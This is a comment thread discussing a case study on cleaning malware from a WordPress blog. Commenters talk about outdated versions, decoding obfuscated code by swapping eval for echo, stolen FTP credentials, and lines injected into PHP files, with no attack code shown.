

Removing malware from a Wordpress blog - Case study - j_lagof
http://blog.sucuri.net/2010/02/removing-malware-from-wordpress-blog.html

======
qeorge
FWIW, this blog was running WP 2.8, which is about 6 months old. Current is
2.9.1. Upgrading is trivial.

If you're not keeping Wordpress updated expect this to happen to your blog
too.

------
wingo
Replacing eval with alert/echo is a nice technique, one I hadn't thought of.

Thankfully I haven't had to think of it in years; their conclusions
(basically, more logging and keeping up-to-date) would be valid if it weren't
Wordpress itself which is usually the attack vector. It's better to use
something else entirely.

~~~
skolor
I'm not convinced that using Wordpress is what directly caused this. From the
article, this was a "quite popular website". If someone from, say, Google, got
a keylogger on their computer, especially one that directly faces the
internet, I would be considerably more inclined to assume it was a targetted
attack, rather than just a random infection.

Just telling someone to use something else doesn't help at all. Telling a user
to stop using Windows because they get infected often may help if they were
simply downloading stuff they shouldn't, but if they were actually being
attacked, moving to Linux, since they will know much less about keeping it
even remotely secure, would lead to a potentially far more dangerous
infection.

------
pvg
It really says something about Wordpress that it has its own ecosystem of
malware, like an OS or browser. Except unlike an OS or browser, it just does
blogs. The sensible solution is probably what people get told when they use a
browser with a poor security record - 'don't use that'.

------
kvs
Wouldn't it make sense to let Wordpress host your blog? Lately there seems to
be one too many security updates for Wordpress. Why let the customer distract
themselves with Wordpress upgrades etc. Was the cost-benefit of this looked
into during this removal?

------
callmeed
I've had this happen to 3 customers. I read somewhere that the cause could be
a compromised FTP password found via malware on the user's PC.

~~~
CWuestefeld
I found a similar problem on one of my own hobby sites. I don't think the
problem was with a compromised PC, but with a bug in an old version of
WordPress. IIRC, there was a weakness with WebDAV that provided a back door.

Anyway, the solution was both more obvious and easier to fix than this article
describes. Every PHP file had a line injected at the very top. It was simply a
matter of stripping this extra line from each of several hundred lines -- a
little time consuming, but not a big deal.

